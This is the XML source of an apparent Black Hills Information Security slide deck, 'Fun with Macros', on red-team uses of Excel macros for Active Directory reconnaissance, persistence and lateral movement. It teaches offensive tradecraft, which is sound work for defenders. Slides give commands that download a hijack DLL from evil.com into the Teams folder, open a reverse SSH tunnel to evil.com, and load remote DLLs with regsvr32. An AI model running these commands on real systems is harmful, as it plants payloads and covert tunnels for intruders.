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67" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="270" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="283" r:id="rId32"/>
    <p:sldId id="282" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="285" r:id="rId35"/>
    <p:sldId id="284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3" roundtripDataSignature="AMtx7mjB1NUlldcgknPfzVPdAMpXbhA7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391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44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188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331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814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35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46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02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894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0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7256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4816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6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54299" y="92525"/>
            <a:ext cx="90762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838209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814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814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814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253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9244" y="5165004"/>
            <a:ext cx="1692996" cy="16929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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1520496" y="6074474"/>
            <a:ext cx="20214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Black Hills Information Security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@BHInfoSecurity</a:t>
            </a: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95911" y="6281245"/>
            <a:ext cx="176329" cy="17632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1" y="0"/>
            <a:ext cx="12192000" cy="1055700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="1D242E">
                  <a:alpha val="56862"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="7000">
                <a:srgbClr val="4C4949">
                  <a:alpha val="75686"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="262626">
                  <a:alpha val="84705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="88000">
                <a:srgbClr val="000000">
                  <a:alpha val="66666"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="99000">
                <a:srgbClr val="3F3F3F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3F3F3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6" descr="https://www.blackhillsinfosec.com/wp-content/uploads/2016/11/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4320" y="0"/>
            <a:ext cx="2850858" cy="10556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0395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60E6394-74C5-5761-1305-8BA40DB9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1000"/>
            <a:ext cx="9144000" cy="1655700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Fun with Macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>David Fletcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 18,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60E6394-74C5-5761-1305-8BA40DB9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1000"/>
            <a:ext cx="9144000" cy="890068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177277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4B1E-E321-3634-2DE8-AFF9E89B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Reconnaissance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66C1-275F-48F6-6F76-82DE921D3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details useful for attack formulation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Running process listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program Files entries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F5733-81EE-F076-04A6-6EBAB91F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41" y="1809750"/>
            <a:ext cx="4433511" cy="2341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578A4-A95B-FD0E-032B-79903617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695" y="3681610"/>
            <a:ext cx="2681208" cy="225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BF853-C631-A2AF-39A7-7D2648182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155" y="4245507"/>
            <a:ext cx="5992298" cy="25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7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DE5D-BA9E-7D81-9A8B-D4199A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Reconnaissance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8C153-A2A9-5CD7-9665-E15414761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Active Directory Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default domain policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fine-grained policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Machine Account Quota</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Functional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28EC4-AC3D-7570-51C7-2668602F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57" y="1438155"/>
            <a:ext cx="5663323" cy="1733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A62E1-B92B-CB00-06FC-9DF4342F0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392" y="3428930"/>
            <a:ext cx="1574058" cy="12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F1EB-7961-CB79-FDD0-DF46C93A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Reconnaissance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83C-FB9A-2605-F267-08C965FB8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Details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metadata Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials in attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password last set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Account Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password never expires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password not required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reversible encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos pre-auth not required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service Principal Names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5E988-D0FA-D222-9603-19DB56CC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70" y="1422473"/>
            <a:ext cx="4178848" cy="3416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5372E-114E-7A4B-7FAF-08B16139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453" y="3608910"/>
            <a:ext cx="4178848" cy="22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1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F1EB-7961-CB79-FDD0-DF46C93A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Reconnaissance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83C-FB9A-2605-F267-08C965FB8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Details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain controller identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metadata analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comment/Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Last Set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service Principal Names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service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3878C-C533-61FF-7912-EDAB56F5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099" y="1253331"/>
            <a:ext cx="3100629" cy="4006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F6162-6CF5-A1C4-D86B-B4F4457B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702" y="3004911"/>
            <a:ext cx="3760797" cy="27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9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713F-F6F0-E070-B6C3-2D034700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Reconnaissance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60A0D-F55C-F116-F918-52D2DD95C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AD Objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sites and Subnets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DFS Shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Groups Details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive group membership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Domain Targeting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B2850-ECA8-E91D-480C-95BF511F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48" y="1495062"/>
            <a:ext cx="5391902" cy="2105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FBCB2-94D2-D669-4292-6F621F34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79" y="3733697"/>
            <a:ext cx="5115639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9C72F-DE39-CE15-8C43-040B04972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547" y="4257593"/>
            <a:ext cx="430590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E5A6-E17A-BCC0-510F-C86D3EDA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Reconnaissance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D6C7-F181-73CE-6711-67E59CB5C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Analysis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Groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter target name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run subroutine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Works like net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55967-6958-8D63-6DBB-6ADBC116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63" y="1253331"/>
            <a:ext cx="5606472" cy="3443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8A4EE1-E50D-8663-59E2-F3C68B97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16" y="3527539"/>
            <a:ext cx="3070131" cy="29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71B-4E92-CFA5-BF8A-D8232F59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Policy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F292-6ED3-EEA5-2E84-CB9A7023C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Artifacts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Browser shortcuts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mapped network drives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom policy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05BC-0A8B-502F-CF47-66991B51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40" y="3428931"/>
            <a:ext cx="9359060" cy="27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5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03F6-E2B6-E0C1-0B51-BB9DC957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8F37-450D-65E2-81EE-EACC86F4A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similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerUpSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> connection test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze computer SPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extract those with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSSQLSvc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attempt to connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List databases if successful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interactively explore using Excel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AEDF8-A0C6-A33A-D1E6-B4305ACF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31" y="4271882"/>
            <a:ext cx="779253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0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4DBC-5433-AD34-B1B4-E147AAE2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 DB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BB0A-CEDC-B815-C87F-AF7B14B3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" y="1338164"/>
            <a:ext cx="3310211" cy="120005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6746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83A1-9606-0076-B763-63917C6D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40434-3AE4-5BF3-4955-B2827D47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non-execution activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encourage creative use of macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expand tooling options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204852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4DBC-5433-AD34-B1B4-E147AAE2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 DB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BB0A-CEDC-B815-C87F-AF7B14B3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" y="1338164"/>
            <a:ext cx="3310211" cy="1200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60785-E94D-CE35-E476-A7766302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51" y="2633627"/>
            <a:ext cx="2455550" cy="14716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109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4DBC-5433-AD34-B1B4-E147AAE2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 DB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BB0A-CEDC-B815-C87F-AF7B14B3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" y="1338164"/>
            <a:ext cx="3310211" cy="1200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60785-E94D-CE35-E476-A7766302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51" y="2633627"/>
            <a:ext cx="2455550" cy="1471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C0219-54D5-08BA-8511-3B599CE3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756" y="2995970"/>
            <a:ext cx="2795485" cy="155697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DDAE20-C78C-8B5F-E75C-5D9388434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756" y="1352454"/>
            <a:ext cx="1695687" cy="148610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295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4DBC-5433-AD34-B1B4-E147AAE2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 DB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BB0A-CEDC-B815-C87F-AF7B14B3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" y="1338164"/>
            <a:ext cx="3310211" cy="1200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60785-E94D-CE35-E476-A7766302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51" y="2633627"/>
            <a:ext cx="2455550" cy="1471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2ABE3C-226F-AE36-C5A4-948BD2E3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097" y="1843000"/>
            <a:ext cx="2787376" cy="270994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C0219-54D5-08BA-8511-3B599CE31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756" y="2995970"/>
            <a:ext cx="2795485" cy="1556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DDAE20-C78C-8B5F-E75C-5D9388434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756" y="1352454"/>
            <a:ext cx="169568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5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4DBC-5433-AD34-B1B4-E147AAE2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 DB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BB0A-CEDC-B815-C87F-AF7B14B3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" y="1338164"/>
            <a:ext cx="3310211" cy="1200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60785-E94D-CE35-E476-A7766302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51" y="2633627"/>
            <a:ext cx="2455550" cy="1471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2ABE3C-226F-AE36-C5A4-948BD2E3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097" y="1843000"/>
            <a:ext cx="2787376" cy="2709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C0219-54D5-08BA-8511-3B599CE31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756" y="2995970"/>
            <a:ext cx="2795485" cy="1556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DDAE20-C78C-8B5F-E75C-5D9388434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756" y="1352454"/>
            <a:ext cx="1695687" cy="1486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09C8B8-CEA7-D38A-1D03-A1B4291D6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756" y="4710358"/>
            <a:ext cx="6573167" cy="15337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9527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64EC-51FD-4695-C4DD-E4D28553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9E4D-8D5D-914E-351D-EAC350938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SOCKS Proxy Execution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Proxifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target excel.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify DC IP in macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Runas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netonly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute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1702C-FA4D-B5E0-33CD-8C115109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13" y="3907143"/>
            <a:ext cx="4048587" cy="1796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ADD92-2CA6-72D3-2137-D4ABDA00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42" y="3158350"/>
            <a:ext cx="5649113" cy="2238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27E1E3-ED4A-7AB6-A096-57C36ED5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204" y="1274223"/>
            <a:ext cx="609685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7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60E6394-74C5-5761-1305-8BA40DB9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1000"/>
            <a:ext cx="9144000" cy="890068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Direct Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49805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0912-3FE3-A2B5-D60B-82187541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Abuse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5124E-ABBA-BC52-CC8F-5731E0B9F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OpenSSH on Modern Windows Clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonly accessible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ssh.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sftp.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outbound SSH on TCP 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure tunnel-only or SFTP-only user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use outbound SSH to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retrieve payload file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse SSH tunnel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D4777-1932-1C25-0F6A-41C1BA0C7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100" y="1380770"/>
            <a:ext cx="3943900" cy="20481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23799-4EDA-3625-C35C-95D1A643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41" y="3631374"/>
            <a:ext cx="3381218" cy="30609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4304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4BB7-53A6-5201-D06A-1AAFA9D9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User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2898-BC10-32C6-DF79-94E4496E3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user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set shell to useless entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate ssh key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shorter  = better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ed25519</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure SSH to listen on desired port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restart SSH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B79B7-FC95-2CD4-32AF-5FE60B12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196" y="1253331"/>
            <a:ext cx="6477141" cy="2823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CDAC6-4BC3-D0EF-C8BD-E712E395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859" y="4230930"/>
            <a:ext cx="3067478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3388F-1711-6475-774E-EE0B2E7F8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781" y="5294873"/>
            <a:ext cx="457263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6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EECE-1C5D-F57F-C473-AA3F9D7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SSH Abuse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9354-91B4-F22E-4DAB-79F2375E7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SSH key to user accessible location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drop LNK file to useful location:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start Up folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop (hotkey persistence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LNK Contents:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command to retrieve payload &amp; execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command to copy payload to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hijack location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command to initiate reverse tunnel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C71A8-29FC-543A-88A6-8A92503D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22" y="1366580"/>
            <a:ext cx="343900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98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2ACE-801C-8064-5F1E-6F3C2841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LNK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A3EE-C463-1CFD-12A7-5ECCF2718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SFTP Download and Execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sftp.exe -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>StrictHostChecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=accept-new –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HashKnownHosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=yes -p 443 –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sysupdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> sysupdate@evil.com:/version.dll C:\Users\Username\AppData\Local\Microsoft\Teams\Current\version.dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tunnel-Only SSH Connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ssh.exe –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>StrictHostChecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=accept-new –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HashKnownHosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=yes -p 443 –N –R 9050 –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sysupdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> sysupdate@evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNC Path Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>regsvr32.exe \\InternalServer\SharedFolder\evil.dll</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403218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83A1-9606-0076-B763-63917C6D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40434-3AE4-5BF3-4955-B2827D47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Advocated Active Directory Explorer use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory Explorer limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View only (no export)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to search (commonly crashes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developed Excel replacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bloodhound released around same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is old is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A2CA8-08DB-DA4D-CCE0-E10EA898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44" y="3912308"/>
            <a:ext cx="1752845" cy="1486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88011-FD78-594D-AF2D-2EB15EE6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0" y="1472598"/>
            <a:ext cx="3806750" cy="2336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60423-77CA-83DC-38F5-19E1EEB4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339" y="3921833"/>
            <a:ext cx="198803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67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4BB7-53A6-5201-D06A-1AAFA9D9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Post-Compromise Lateral Movement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2898-BC10-32C6-DF79-94E4496E3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payload on SMB share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for custom binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Poison existing frequently-used macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drop LNK file to useful location:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start Up folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop (hotkey persistence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LNK Contents:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command to execute dropped payload file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>regsvr32.exe \\fileserver\writeableshare\totallylegit.dll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5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A7C-C70B-4438-E573-D31D187D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B611-246F-2DD5-41D7-142B35D7F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Offense:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be creative with M365 product access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Surrogate reconnaissance activities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to resources (GPO and SQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
